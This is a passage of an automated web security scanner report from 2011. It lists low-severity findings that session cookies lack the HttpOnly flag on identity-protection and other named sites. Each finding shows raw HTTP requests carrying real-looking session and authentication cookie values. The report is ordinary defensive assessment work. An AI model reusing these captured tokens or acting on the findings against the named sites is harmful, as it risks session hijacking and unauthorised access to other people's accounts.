Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:54:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=00004gQx0HYIzU0u1rsJFSCKOae:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002778497=100000002778497%2cfuFkopkWEkisK7JVwSHZCk2Fg64%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002778497=100000002778497%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvaKV1emOZmaDIsN60yDGs%2f4FZeGlU%2fcp4iOWyLpRXGCfz%2fwweHVY7Hq%2bwZIeUab4Rdh%0a970qOhWk1U0%2b34FkyW3t2a0ceHvoL5Um9KCH%2bCco7lhMPZfqD3H0mz2OHDBpxmE3tpO1JboG1SI8%0aX7oYHanN; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...

18.31. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/EnrollmentStep1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:54:57 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=000035X06bwKDD8N7alBoK7raIX:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002778501=100000002778501%2cREgbC04LJ6U1QpS0gdsZp%2f3mOwg%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002778501=100000002778501%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvasC%2bE9g%2bXauPutHRYRK1bUlw2emLGIRuiWRlKXr%2b90jRo1I1u%2bOQIWI7oj%2bEf7YNBQ%0a1dZ9QymMr1N6N8l%2ffmEBdTr4it3pen6k0SUux3SsboNk39BJXEe%2fMErd2KqRTSLtByQPtj9hPiYc%0a8nzOTygk; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...

18.32. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXContactUs  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXContactUs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXContactUs HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:14 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000JEHZujswBDR5wgEMRinwd8Q:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5245


<!-- Start of JSTLEnvironmentSetup.jspf -->


   
...[SNIP]...

18.33. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:49 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000RU_ayvVxP7vPjd2RpcqdQ4B:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

18.34. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:20 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000d43uPIRRqVNCyWFXQ9JvUnG:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 2080


<!-- Start of JSTLEnvironmentSetup.jspf -->


   
...[SNIP]...

18.35. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:04 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000JNwX44ij8bl52XAeGH6hC-R:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...

18.36. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Logoff HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 16:55:30 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
$WSEP:
Set-Cookie: JSESSIONID=0000COYz6QjJhyUvKX-OFTBz5a5:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 667


<HTML>


<HEAD><TITLE>Error 404</TITLE></HEAD>
<BODY>

<FONT size="+1">An error has occurred:</FONT>
<TABLE border="2" bordercolor="#98d3ec">
   <TR bgcolor="#
...[SNIP]...

18.37. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...

18.38. http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://smartcompanygrowth.com
Path:   /bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg HTTP/1.1
Host: smartcompanygrowth.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:40:13 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://smartcompanygrowth.com/xmlrpc.php
Set-Cookie: PHPSESSID=56b30beb6b215f9bb9cb2ca1888fedb3; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 64437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

<!--
...[SNIP]...

18.39. http://swisscomonlineshop.sso.bluewin.ch/Onlineshop/Scripts/jquery.tagsphere.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /Onlineshop/Scripts/jquery.tagsphere.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Onlineshop/Scripts/jquery.tagsphere.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:08 GMT
Set-Cookie: JSESSIONID=4C79BA23E1D2C181DE6FC94464076D61; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "88446274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 10413

(function(c) {
c.fn.tagcloud = function(d) {
var e = c.extend(c.fn.tagcloud.defaults, d);
